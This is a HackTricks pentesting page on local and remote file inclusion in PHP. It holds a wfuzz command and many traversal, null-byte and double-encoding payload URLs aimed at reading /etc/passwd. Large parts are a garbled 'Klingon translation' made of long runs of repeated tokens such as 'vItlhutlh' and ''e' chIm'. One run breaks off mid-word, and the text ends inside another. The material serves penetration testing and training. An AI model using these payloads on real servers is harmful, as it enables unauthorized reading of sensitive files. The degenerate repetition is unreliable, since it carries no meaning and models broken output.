hacktricks/pentesting-web/file-inclusion
2024-02-10 17:52:19 +00:00
..
lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md Translated to Klingon 2024-02-10 17:52:19 +00:00
lfi2rce-via-eternal-waiting.md Translated to Klingon 2024-02-10 17:52:19 +00:00
lfi2rce-via-nginx-temp-files.md Translated to Klingon 2024-02-10 17:52:19 +00:00
lfi2rce-via-php-filters.md Translated to Klingon 2024-02-10 17:52:19 +00:00
lfi2rce-via-phpinfo.md Translated to Klingon 2024-02-10 17:52:19 +00:00
lfi2rce-via-segmentation-fault.md Translated to Klingon 2024-02-10 17:52:19 +00:00
lfi2rce-via-temp-file-uploads.md Translated to Klingon 2024-02-10 17:52:19 +00:00
phar-deserialization.md Translated to Klingon 2024-02-10 17:52:19 +00:00
README.md Translated to Klingon 2024-02-10 17:52:19 +00:00
via-php_session_upload_progress.md Translated to Klingon 2024-02-10 17:52:19 +00:00

File Inclusion/Path traversal

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

File Inclusion

Remote File Inclusion (RFI): The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is disabled by default (allow_url_include).
Local File Inclusion (LFI): The sever loads a local file.

The vulnerability occurs when the user can control in some way the file that is going to be load by the server.

Vulnerable PHP functions: require, require_once, include, include_once

A interesting tool to exploit this vulnerability: https://github.com/kurobeats/fimap

Blind - Interesting - LFI2RCE files

wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

Linux

Mixing several *nix LFI lists and adding more paths I have created this one:

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %}

Try also to change / for \
Try also to add ../../../../../

A list that uses several techniques to find the file /etc/password (to check if the vulnerability exists) can be found here

Windows

Merge of different wordlists:

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %}

Try also to change / for \
Try also to remove C:/ and add ../../../../../

A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found here

OS X

Check the LFI list of linux.

Basic LFI and bypasses

All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also (page=http://myserver.com/phpshellcode.txt\.

http://example.com/index.php?page=../../../etc/passwd

qImHa' 'ej qo'lu'chugh 'e' yIqImHa' 'ej 'e' yIqo'lu'chugh

Description

When performing file inclusion attacks, it is common to encounter input sanitization mechanisms that attempt to prevent directory traversal attacks by removing traversal sequences such as "../" or "..". However, these sanitization mechanisms are often implemented in a non-recursive manner, which means that they only remove one occurrence of a traversal sequence at a time. This can be exploited by an attacker to bypass the sanitization and successfully perform a directory traversal attack.

Impact

By exploiting this vulnerability, an attacker can access sensitive files or directories outside of the intended directory structure. This can lead to unauthorized access to confidential information, remote code execution, or other security breaches depending on the specific context and permissions of the vulnerable application.

Recommendation

To mitigate this vulnerability, it is recommended to implement a recursive sanitization mechanism that removes all occurrences of traversal sequences in the input. Additionally, it is important to validate and sanitize user input effectively to prevent other types of attacks such as SQL injection or cross-site scripting (XSS). Regular expression-based input validation can be a useful technique to achieve this.

Example

Consider a web application that includes files based on user-supplied input without proper sanitization. The application removes "../" from the input to prevent directory traversal attacks. However, the sanitization is implemented non-recursively, allowing an attacker to bypass it by using multiple traversal sequences.

GET /page?file=../../../etc/passwd HTTP/1.1
Host: vulnerable-website.com

In this example, the attacker is able to access the sensitive file /etc/passwd by using multiple traversal sequences. If the sanitization mechanism were implemented recursively, it would remove all occurrences of traversal sequences and prevent this attack.

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

Null byte (%00)

Bypass the append more chars at the end of the provided string (bypass of: $_GET['param']."php")

Null byte (%00)

Bypass the append more chars at the end of the provided string (bypass of: $_GET['param']."php")

http://example.com/index.php?page=../../../etc/passwd%00

qaStaHvIS PHP 5.4 Sov.

Encoding

non-standard encondings vaj double URL encode (and others) vaj chu'.

http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

vIghoS

qatlh backend vItlhutlh. Dochmey path folder vItlhutlh:

http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd

qawHaq File System Directories on a Server

The file system of a server can be explored recursively to identify directories, not just files, by employing certain techniques. This process involves determining the directory depth and probing for the existence of specific folders. Below is a detailed method to achieve this:

  1. Determine Directory Depth: Ascertain the depth of your current directory by successfully fetching the /etc/passwd file (applicable if the server is Linux-based). An example URL might be structured as follows, indicating a depth of three:
http://example.com/index.php?page=../../../etc/passwd # depth of 3
  1. Probe for Folders: Append the name of the suspected folder (e.g., private) to the URL, then navigate back to /etc/passwd. The additional directory level requires incrementing the depth by one:

  2. Qa'Hom vItlhutlh: URL DaH jatlh (e.g., private) vaj navighegh /etc/passwd vay'. vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh

http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
  1. QapHa'wI': Server jatlhqa' 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e' chIm 'e
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd

Qa'Hom QaD

Qa'Hom QaD, web applications vItlhutlh file paths manipulate method. Qa'Hom QaD, file paths 'ej vItlhutlh security measures bypassing restricted files access laH. Qa'Hom QaD, file path, vItlhutlh security measure, vItlhutlh file pointing 'e' vItlhutlh path crafted.

PHP, file system nature vItlhutlh, file path various representations equivalent considered vIghro'. jatlh:

  • /etc/passwd, /etc//passwd, /etc/./passwd, /etc/passwd/ path vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh.
  • vItlhutlh 6 characters 'e' passwd vItlhutlh, / (vItlhutlh passwd/) vItlhutlh targeted file vItlhutlh vItlhutlh.
  • vItlhutlh, .php file path vItlhutlh (vItlhutlh shellcode.php), /. vItlhutlh vItlhutlh file vItlhutlh vItlhutlh.

vItlhutlh examples provided /etc/passwd access demonstrate Qa'Hom QaD, sensitive content (user account information) vItlhutlh common target:

http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd

**QIb Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je QaQ Segh je 